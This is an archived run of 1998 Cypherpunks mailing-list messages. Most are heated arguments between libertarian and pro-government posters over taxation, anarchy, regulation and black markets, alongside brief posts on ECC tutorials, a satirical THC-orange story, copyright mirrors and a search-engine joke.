Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Tue, 10 Nov 1998 09:08:11 -0500
> > From: Soren <sorens@workmail.com>
> > Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
> 
> > <P>This also provides an outlet for the social do-gooders to create their
> > utopias by vastly inflating those taxes associated with less favored consumables
> 
> Hm, interesting choice of terms for comparison. So you're admitting that
> anarcho-whatever isn't a social do-gooder, the intent is not to make the
> system better or more equitable.

No, the intent *is* to make the system better and more equitable.  It's
just that we don't favor the socialist definition of "equitable".

We support voluntary systems, not coercive ones.

> Rather you're admitting, apparently
> tacitly, that the goal of the anarcho-whatever is personal rather than
> social improvement. There is also a further tacit admission with this
> system won't address the social ills that plague us currently.

Except that it's personal improvement for *everyone* (except for tyrants
and other politicans, but we didn't like them much anyway).

> I must admit I'm impressed. In a couple of days I've run across two seperate
> anarcho-whatever supporters who admit their proposal won't address the
> social ills but rather leaves them up to chance. That's more than in the
> last 20 years.

Our proposals do not leave things up to chance any more than the current
system does.  In fact, it can be argued that our system leaves less up
to chance than yours does.  Lets do a comparative analysis.

In today's system:

1:  	Social Ill exists.
2: 	Social Ill is identified by someone.
3:	That someone makes a lot of noise, and lobbies the state to supply
money to finance the correction of the Social Ill.  This is done by
convincing a majority of voters in some election or other, which may not
take place for at least a year, that this Social Ill is very important
--more important than all the other Social Ills.
4:	Someone who wants the Social Ill corrected gets into power, and
proceeds to try to correct the Social Ill with a huge rumbling
centralized governmental machine.  This often excacerbates the Social
Ill, rather than correcting it.

The net result:  The Social Ill is not likely to be corrected until the
next election, and will be paid for by taking more money away from
everyone else (since the state gets its money from taxpayers, and cannot
create value out of thin air).  Even worse, the person lobbying for the
correction of the Social Ill may not get into power, since he may have
lost the election to someone who used lots of money to make him look
bad.  Thus, the Social Ill may not get corrected for some time, if ever.

Under a truly free system:

1:	Social Ill exists.
2:	Social Ill is identified by someone.
3:	That someone makes a lot of noise, alerting everyone else to the
existance of this Social Ill.  Those who agree with the first someone
will contribute time, money, and resources to correcting this Social
Ill.  
4:	Social Ill is dealt with in the most effective manner possible, since
people will be free to try to correct it in any number of ways, and will
of course prefer to contribute their money to an effort that has the
best effect.

This is an improvement upon today's system.  We no longer need to have
the majority of voters approval to start correcting the Social Ill.  All
we need is a group of people who are willing to support the correction
of the Social Ill.  This makes the most sense, since we obviously don't
need to draw on *everyone'* resources to correct every Social Ill.  (of
course, some rare Social Ills will be that large, but the larger the
Social Ill, the more people wil recognize it as such.)

Better yet, frivilous problems (i.e. those invented for the advancement
of some politician's career, or out of sheer stupidity) will not have
large amounts of resources wasted upon them.  Only the most blind and
stupid of people would contribute to the correction of nonexistant
Social Ills (of course, that is their right, but at least nobody else
will have to waste their money, if they don't wish to).

So, is it now clear to you why your above statement was somewhat
premature?

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 07:30:55 +0800
To: "Albert P. Franco, II" <sorens@workmail.com>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the   Foregone(fwd)
In-Reply-To: <36484ED1.6F3B9F1E@workmail.com>
Message-ID: <v0401171cb26e61f26244@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain




At 4:43 PM -0500 11/10/98, Albert P. Franco, II wrote:


I left the good ol' USA too. I now live in a European country with a strong
socialistic government and I actually find very little interference in my
day to day life. In fact there seems to be a much higher awareness that
each

	Crap. They take 60+ percent of your income in taxes, that means
that they take 60+ percent of your working day.

	They (at least france) throw up HUGE barriers to anyone wanting to
start a business, especially if they will need to hire workers. This not
only makes it difficult for you to start a business (which would never
happen since you've indicated you like someone else making decisions for
you) but also increases unemployment (prevents others from creating jobs
rather than just begging for them).


individual is responsible for his and her actions. At the very least there
aren't as many lawyers claiming everyone is a victim of something or
another (ie. too hot coffee, slippery floors, home owners that shot the
poor intruder who didn't get a warning first, etc.)


	Of course not, it's the states fault.


Ain't no where perfect, anarcho-whatever was done about 4000 years ago, I
generally prefer to look forward...

	So, the fact that it hasn't been tried in 4000 years means it will
never work?

	I guess it's a good thing the wright brothers didn't take that
attitude, nor Robert Goddard.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rsriram@krdl.org.sg (R Sriram)
Date: Tue, 10 Nov 1998 17:25:08 +0800
To: cypherpunks@toad.com
Subject: Papers and tutorials on ECC.
Message-ID: <199811100857.QAA29789@aquila.iss.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain




FYI:
There are some good tutorials and papers on ECC at
http://www.certicom.com/ecc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 08:06:25 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811102345.RAA20475@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 09:38:55 +1000
> From: Reeza! <howree@cable.navy.mil>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> >Like I said, at least your more honest than the rest of these wanna-be
> >thieves.
> 
> Your earlier reply on honesty was to Petro, I think you are confusing me
> with him.

Then the two of you are more honest than most of the anarcho-whatever folks
I've come across.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 08:16:14 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Off Topic But Truly Beautiful (fwd ) (fwd)
Message-ID: <199811102347.RAA20592@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 13:11:21 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Off Topic But Truly Beautiful (fwd )

> >     A Florida Biochemist designs a citrus tree with THC.

Geesh, it's about time. I was wondering what the hell was taking these folks
so long to map those mechanisms over into other organisms.

Good for him!


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 10:04:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: most of what govts do can be done by business, and donebetter (Re: How to solve the tax problem w/o anarchy or force)
In-Reply-To: <199811100157.RAA05844@netcom13.netcom.com>
Message-ID: <v0401171fb26e7590fd87@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:39 PM -0500 11/10/98, Adam Back wrote:
>Vladimir Nuri writes:

>> well consider things like roads,
>
>if you don't drive you shouldn't have to pay for them.

>> libertarians tend to be awfully realistic some times. who pays for
>> roads when everyone uses them?
>
>don't pay not allowed to use.  not everyone uses them to drive cars
>on.

	Roads are the easiest (assuming a government model) things to apply
road use taxes to, simply tax gasoline, oil, and tires. Scale your tire tax
based on weight and apply it to bicycles as well, then everyone (execpt
peds) who uses pays.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 08:59:09 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811110037.SAA20949@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 10:40:16 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	No, I am saying that since EVERY government at one time or another
> treats its citizens like roaches, it's time to radically change the nature
> of it so that it basically can't be called a government any more.

The problem isn't government, it's the people who enforce the government
that abuse it.

> >Well actualy it's whether it has a tax stamp whether you sell it out of a
> >storefront or a truckbed is irrelevent. Considering the number of people wh=

> 	Wanna bet?

Absolutely. I happen to know a whole passel of beer, wine, and liqour
makers. Austin as aswim in micro-breweries. I'd be more than happy to pass
your email address to the enibriated set and let them argue the point with
you.

> 	Most states have fairly strict laws concerning where liquor can be
> sold.

Actualy it's not the states (at least Texas and Louisiana), it's the local
cities. The state of Texas doesn't care as long as you pay your liquor
license and don't sell to minors and obey the local zoning ordinances.

Texas Alchohol and Drug Abuse Commission
9001 N. IH-35, #105, 78753
512-349-6600

Texas Attorney General Office
Taxation: 512-463-2002

Texas Alcoholic Beverage Commission
512-458-2500

> 	Which is completely irrelevant as to wheter or not it is currently
> black market or not, which is the context I was working in.
> 
> 	Stay on target.

I am on target. The fact that a unregulated alcohol industry led to death,
debilitation, and financial hardship justified the imposition of regulation
on alcohol and its related operations.

You just don't want the entire picture painted because it cast a harsh light
on the premise that un-regulated economies are good things.

> >Not necessarily. The doctor has to have a medicaly supportable reason to
> >dispence those drugs. Otherwise it's just as black market as Joe's.
> 
> 	Quibble Quibble. You know EXACTLY what I meant.

Yeah, you meant to commit an act of ommission so that your position looks
more favorable than it actualy does.

> >Didn't think of theft? Jesus H. Christ, you gotta be on Joe's drugs. The
> >vast majority of material sold on *ANY* black market is stolen from its
> >rightful owner. It is *the* example of black market trading that most folks
> >think of first.
> 
> 	No, the vast majority (in terms of dollars) of stuff sold on the
> black market is Drugs.

Really? Drugs are what $10B US a year or so. I bet stolen automobiles when
taken as a whole gross more loss than that. And what makes you think that
the vast majority of that drugs aren't purchased at the street level with
funds gotten from theft? The drugs may not be stolen, the dollar that they
were bought with was in most cases.

> 	Treat theft like any other economic activity, and figure out how to
> make it unprofitable.

Let me know when you figure that one out.

> >How the hell do you sell something on the black market if you don't have
> >possession of it? And exactly who is going to prosecute anyone for
> 
> 	Easy, it's called a Con.
> 
> 	Seriously tho, I said that the _selling_ of stolen goods might not
> be illegal, but the possesion of such things, and the stealing of them are
> seperate acts to the selling of them.

Still doesn't answer my question.

> 	There isn't a need to. Shoot them.

Ah, so you admit that the general mechanism to settle inter-personal dispute
under your plan is to allow people to run around shooting each other.

Well, at least we've got an honest admission that murder would be legal in
this system.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 09:15:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811110052.SAA21018@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 11:13:07 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	Really, you are saying they couldn't possibly recognize the
> benefits of teaming up and co-locating fire stations, or that they wouldn't
> sub-contract to a company that handled fires?

So, you want to sub-contract out which is going to raise the cost and
doesn't alleviate the insurance company from regulatory and supply issues.
It'd cost a fortune.

> 	This could still be more effcient than government.

I'd love to see your cost breakdown...

> 	"reasonable" in cost? There is a LOT if inefficiency in the system
> that competition could eliminate.

Yep, and a lot of people the competition would eliminate as well. I'll live
with the inefficiency as long as the cost is affordable for the quality of
service delivered. I don't mind fireman sitting around eating bar-b-q unless
somebodies house burns down.

> 	Read that last bit. They got so carried away, that they spent
> themselves out of existence.

That is one example, I know of several fortune 100 companies that are equaly
extravagant. The problem with Compu-Add was they shot their whole wad.

> 	Governments just raise taxes, there is no penalty for ineffcientcy,
> or lousy spelling.

Sure there is, it just takes longer than a rifle bullet to settle.

> 	Ok, so you limit the senators and congressmen, then the unelected
> beaureacrats have the power since they know the system and run the system.

Not at all, they are limited in what they can do by the laws. It's not like
they're running around sending bills to people out of the blue and making up
the system as they go along. Despite your protestations to the contrary the
system just don't work that way.

> 	Wearing a painted leather jacket & ripped up blue jeans is NOT a
> reason to get hauled off the street, searched and questioned.

If it happened to you and you didn't file a harrassment complaint then you
got what you deserved. If you don't use the system it won't work.

Never happened to me or anyone I knew unless they were in particular places
at particular times. If a cop busts people at a corner every nite for
breaking the law it isn't the cops fault, it's the stupid people who keep
doing the same damn thing at the same place knowing full well the consequences.

> 	Looking different is not illegal.
> 
> 	Thinking different is not illegal.

Nobody said it was and it isn't. Now if you happen to fit the description of
another perp well that's just too damn bad.

> 	With a bunch thrown in at the federal level. Federal Matching Funds
> & etc.

Oh, malarky (and stay away from my business books). It's obvious you never
do accounting. The matching funds are for roads outside of the city or for
highways that transit cities. They are not supposed to be used for city
street or FM or RM roads.

> 	Then why do they keep building them?

Because we still hav an Army whose job it is to defend this country you
nit-wit. If we didn't keep fixing them and expanding the system as people
move around and expand the Army might find it a tad hard to do their job
when called to it. And yes, I know the Militia is the one who is supposed
to be called in for that sort of stuff - that's a whole other topic.

> 	Promote does not mean "give away", it means "promote", do things
> which incourage.

Absolutely. While I agree that there are some particular issues that need
fixing in a major way that is not the same (as you would have us believe) as
saying as a result the whole system should be scrapped.

> 	They were the heads of the governments. The skills and abilities it
> takes to get to that level insure that the people who get there have no
> concern for those underneath them.

Oh, you mean insanity, egotism, neurosis, etc.?

> 	There is no making up my mind. I never claimed the a government
> could or should, rather I am claiming that it can't and won't, and to
> expect it to be able to, much less willing to is foolish.

Ah, but it does try and in some cases it succeeds. So my expectation is not
completely without merit.

> 	So we agree that any government is doomed from the start, since
> w/out people of honesty and integrity no system will work properly.

No, *all* people are not such. Most people I know are honest and have
integrity. What has to happen is a set of checks and balances, which we are
admittedly short of at the moment. The system isn't perfect, never claimed
to be (read the 1st paragraph if the Constitution), and if it remains so
then it's *OUR* fault and not the systems.

> 	No, that face that stares back from the mirror makes every effort
> to be as honest and forthright as it can. It causes grief sometimes, but
> it's the principle.

You claim to be honest yet promote a system that allows slavery, murder,
theft, and other horrendous crimes against man....


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 09:21:51 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811110057.SAA21081@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 16:40:11 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the   
>  Foregone(fwd)

> I left the good ol' USA too. I now live in a European country with a strong
> socialistic government and I actually find very little interference in my
> day to day life. In fact there seems to be a much higher awareness that
> each

I find very little interference in my daily life as well (except when one of
you anarcho-cooks starts dropping bombs and threatening people).

> 	Crap. They take 60+ percent of your income in taxes, that means
> that they take 60+ percent of your working day.

They take 40% of my income, or are you talking of France taking 60% of your
income. Disagreement over the level or specific policies for spending it do
not justify eliminating the system.

> 	They (at least france) throw up HUGE barriers to anyone wanting to
> start a business, especially if they will need to hire workers. This not
> only makes it difficult for you to start a business (which would never
> happen since you've indicated you like someone else making decisions for
> you) but also increases unemployment (prevents others from creating jobs
> rather than just begging for them).

And you find that a better place to live then the US?

> individual is responsible for his and her actions. At the very least there
> aren't as many lawyers claiming everyone is a victim of something or
> another (ie. too hot coffee, slippery floors, home owners that shot the
> poor intruder who didn't get a warning first, etc.)

What is the percentage of lawyers in France to the total population?

> Ain't no where perfect, anarcho-whatever was done about 4000 years ago, I
> generally prefer to look forward...
> 
> 	So, the fact that it hasn't been tried in 4000 years means it will
> never work?
> 
> 	I guess it's a good thing the wright brothers didn't take that
> attitude, nor Robert Goddard.

We tried anarchy, it's called cave men. As to Wright and Goddard, they had
ample evidence in physics (that's been around what 4.5B years) to build
their expectations on. In the field of politics and social system the only
thing we have to go with is our imagination, patience, understanding, and
past practice. 5k years or a little more.

All of those say anarcho-anything systems won't work.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 10:47:32 +0800
To: Cypherpunks@cyberpass.net
Subject: Re: Off Topic But Truly Beautiful (fwd )
In-Reply-To: <3648A1A9.7DE1@lsil.com>
Message-ID: <v04011701b26e85af9662@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:11 PM -0500 11/10/98, Michael Motyka wrote:
>>     In the summer of 1984, 10th-grader Irwin Nanofsky and a
>>     friend were driving down the Apalachee Parkway on the way
>>     home from baseball practice when they were pulled over by
>>     a police officer for a minor traffic infraction.
...
>>     As policy analysts and hemp advocates alike have been
>>     quick to point out, the apparent legality (for now) of
>>     Nanofsky's "pot orange" may render debates over the
>>     legalization of marijuana moot. In fact, Florida's top
>>     law enforcement officials admit that even if the
>>     cultivation of Nanofsky's orange were to be outlawed, it
>>     would be exceedingly difficult to identify the presence
>>     of outlawed fruit among the state's largest agricultural
>>     crop.

	Once again technology makes the laws irrelevant.


	Gotta love it.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 09:55:18 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811110118.TAA21145@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 16:35:16 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)

> No, the intent *is* to make the system better and more equitable.  It's
> just that we don't favor the socialist definition of "equitable".

Taxation doesn't imply socialism, socialism is the state ownership of
property. In case you didn't know it, Russians didn't pay taxes because they
dind't have to. The Chinese still don't pay taxes (except for businesses
that are licensed by the state).

> We support voluntary systems, not coercive ones.

The US is a voluntary system, you can always leave.

> Except that it's personal improvement for *everyone* (except for tyrants
> and other politicans, but we didn't like them much anyway).

And those who are stolen from, killed in petty disputes, wronged in business
deals gone bad with no legal recourse and no hope of future legal
ramifications for the perps, starve to death because some asshole who values
a dollar more than a human life won't give somebody a meal, those who
can't start businesses because the existing markets have locked up the
necessary resources, etc.

> Our proposals do not leave things up to chance any more than the current
> system does.  In fact, it can be argued that our system leaves less up
> to chance than yours does.  Lets do a comparative analysis.

It leave a lot up to chance, the chance of making a profit in the market
with no regulations or other mechanism to stop abuse or other wrongs.
The implication is that the vast majority of participants won't be the one
making the profit and will as a consequence suffer because of it.

> 1:  	Social Ill exists.
> 2: 	Social Ill is identified by someone.
> 3:	That someone makes a lot of noise, and lobbies the state to supply
> money to finance the correction of the Social Ill.  This is done by
> convincing a majority of voters in some election or other, which may not
> take place for at least a year, that this Social Ill is very important
> --more important than all the other Social Ills.

No, it simply says that the current society has recognized a need,
determined that it can be addressed and chooses to do so.

> 4:	Someone who wants the Social Ill corrected gets into power, and
> proceeds to try to correct the Social Ill with a huge rumbling
> centralized governmental machine.  This often excacerbates the Social
> Ill, rather than correcting it.

Well actualy the huge rumbling centralized government is a result of the
economic impact of business on government, not the folks who want to address
social ills. The vast majority (well over half of each tax dollar) goes to
military or military related issues, not social ills.

This is a strawman.

> The net result:  The Social Ill is not likely to be corrected until the
> next election, and will be paid for by taking more money away from
> everyone else (since the state gets its money from taxpayers, and cannot
> create value out of thin air).  Even worse, the person lobbying for the
> correction of the Social Ill may not get into power, since he may have
> lost the election to someone who used lots of money to make him look
> bad.  Thus, the Social Ill may not get corrected for some time, if ever.

> Under a truly free system:
> 
> 1:	Social Ill exists.

And in spades.

> 2:	Social Ill is identified by someone.
> 3:	That someone makes a lot of noise, alerting everyone else to the
> existance of this Social Ill.  Those who agree with the first someone
> will contribute time, money, and resources to correcting this Social
> Ill.  

And what if that noise is contrary to the interest of a the business that is
perpetrating it. Since there are no protections of speech and press under
your system what keeps somebody from simply shooting the loud-mouthed
trouble maker? Historicaly there is plenty of evidence for this sort of
behaviour in un-regulated markets. Why would a business allow such a
vociferous display?

> 4:	Social Ill is dealt with in the most effective manner possible, since
> people will be free to try to correct it in any number of ways, and will
> of course prefer to contribute their money to an effort that has the
> best effect.

The most effective manner is to never have it happen in the first place.
While it's clear it isn't possible to legislate individual behaviour past a
grossly crude point it is possible to put breaks on the sorts of laws that a
given government can pass and enforce. At least with a bill of rights we
have a guide that we can use to measure extant and future legislation
against.

This can occur now under the present system, why doesn't it happen more?
There is absolutely no regulations that would prevent such activity; hell
the currrent system will even allow you to be exempt from taxes and give you
loans, will yours? But to address the point, given that there are no courts,
laws, etc. How does one go about addressing the social ill? Buy the company
out?

How realistic is it to expect the human slave to have the resources to buy
themselves out? Not very damn likely.

> This is an improvement upon today's system.

Only if you believe your smarter and faster on the draw than everyone who is
alive and will be alive during your life. Ain't gonna happen, there is
always a bigger fish, and they're hungry.

  We no longer need to have
> the majority of voters approval to start correcting the Social Ill.  All

No, you simply need to have the majority of social participants (I don't
think we should call them citizens) involved first person. The time drain
alone of that is enough to guarantee that nothing will be done.

> of the Social Ill.  This makes the most sense, since we obviously don't
> need to draw on *everyone'* resources to correct every Social Ill.  (of
> course, some rare Social Ills will be that large, but the larger the
> Social Ill, the more people wil recognize it as such.)

They will? Historicaly the majority of social ills have been recognized as
such by a minority and were corrected by a political mechanism that
recognizes things like civil liberties and limits on government purvue a
priori.

> Better yet, frivilous problems (i.e. those invented for the advancement
> of some politician's career, or out of sheer stupidity) will not have
> large amounts of resources wasted upon them.

And what makes you think that under your system a silver tongued devil won't
be able to garner the same sorts of support? People are social animals and
will follow the leader they believe will get them to where they need to be.
Whether that is government or a marketing puke is irrelevant.

> So, is it now clear to you why your above statement was somewhat
> premature?

It is clear to me that you neither understand human psychology, politics,
economics (macro or micro), or what freedom means.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Wed, 11 Nov 1998 11:49:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <199811102122.NAA18762@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.93.981110192449.3952E-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



Yeah yeah all very well and good parody except that the 2nd amendment
contains the word "well-regulated" and the 1st doesn't. 

(And yes I know I'm asking for a shitstorm of trouble saying that on THIS
list of all places).


- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 09:58:00 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
Message-ID: <199811110128.TAA21211@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 21:09:38 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)

> One barrier to such an enterprise is the domain name recognition,
> people want wired, they type wired.com; what do they type if they want
> the lower priced mirrors?

The same question can be asked of the shopper who wants the lowest priced
tomato's. It isn't the vendors responsibility to provide those sorts of
mechanism for the consumer (or user of a system). The interpretation of what
lowest price means is so varied that trying to talk of it as some sort of
universal given is like talking about rational consumers. It's a
non-sequitar.

If the consumer wants the lowest price (in their personal estimation) goods
then they have several choices (at least):

 -	They can look for it themselves

 -	They can ask a friend

 -	They can pay somebody else to look for them

 -	Or they can sit back and wait for the relevant production sites
	to contact them (eg Wed's glob of shiney adverts)

There is also the very real question of why would wired allow a 3rd party
sell their product at a lower cost than they can sell it themselves? Not a
rational or good business practice anyway you look at it.

> service.  Therefore one might (somewhat weakly) argue that they
> deprive wired (and others) of click through revenue and they charge
> you thus diverting funds wired et al might otherwise have got.

Yeah, so? Just because I window shop in HEB down the street doesn't mean I
am required to buy anything. And if I walk past a shop and don't register
their window display doesn't mean the store lost anything from me - the very
fact that I ignored it means they weren't going to get my money at that
point. Now if they follow me down the sidewalk and bellow at me I can
guarantee that I (and most other folks) won't buy there even if the price is
lower.

I'd say "quit your whinning".


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 11 Nov 1998 08:44:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
Message-ID: <199811110028.TAA19501@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Adam Back <aba@dcs.ex.ac.uk>
   >
   >   Jim Choate writes:
   >   > 
   >   > Ah, true but I was addressing the last sentence about the cost being so low
   >   > nobody will charge for it.....sounds like the nuclear industry marketing
   >   > speal of the 50's....
   >
   >   One barrier to such an enterprise is the domain name recognition,
   >   people want wired, they type wired.com; what do they type if they want
   >   the lower priced mirrors?

Uno momento...

    http://www.altavista.com
    
    Ask AltaVistaTM a question. 
    Example: "Where can I find information on bicycles?"

Okay, let's give it a spin...

   Where can I find information on low priced mirrors?

Results

    AltaVista found about 1,045,119 Web pages for you. 
    
    1. In this site you'll find low priced computer hardware including Pentium CPU
    2. Pasadena Pins & Patches - Low Priced Jewelry - Die Struck Enamel
    3. Pasadena Pins & Patches - Low Priced Jewelry - Photo-Etched
    4. BUSINESS BOOK SALE! Excellent online, low-priced books here!
    5. Low Priced Beanie Baby Link List Guide
    6. Pentium Computer Systems and Low priced computer components
    7. Inexpensive Software Cheap Software Low Priced Software
    8. D&R Computer - Your source for great low priced home PCs and business systems.
    9. THE UNDER $10 STOCK REPORT - Low Priced - High Yield Stocks
    10. Spider Web Designs - low priced web-site design, development, hosting, and cre

Hmmm, let me try that again.

The "+" is a meta-search character, meaning required.

    Where can I find information on low priced +mirrors?

    1. Miscellaneous Optical Suppliers. Polarizers.
    2. The Bronze Face Mirror is a large (14 x 12 cm) mirror made out of clay. 
    3. The Eye Rings that have a diameter of 2cm are made from a special clay. 
    4. This Mermaid of Flower ? make up shelf (24 x 84cm) is made from wood.
    5. This large (20 x 30 cm) Corset mirror is made from clay and wood. 
    6. The Large Space Ship Mirror is now made from wood (70 x 45 cm) 
    7. Gold-Leafed Oval Mirrors. Original designs, sophisticated finishes, and remarkable wholesale prices.
[ DING DING DING DING! ]
    8. These Wooden Lips are available in Red, Pink and Purple (76 x 53 cm). 
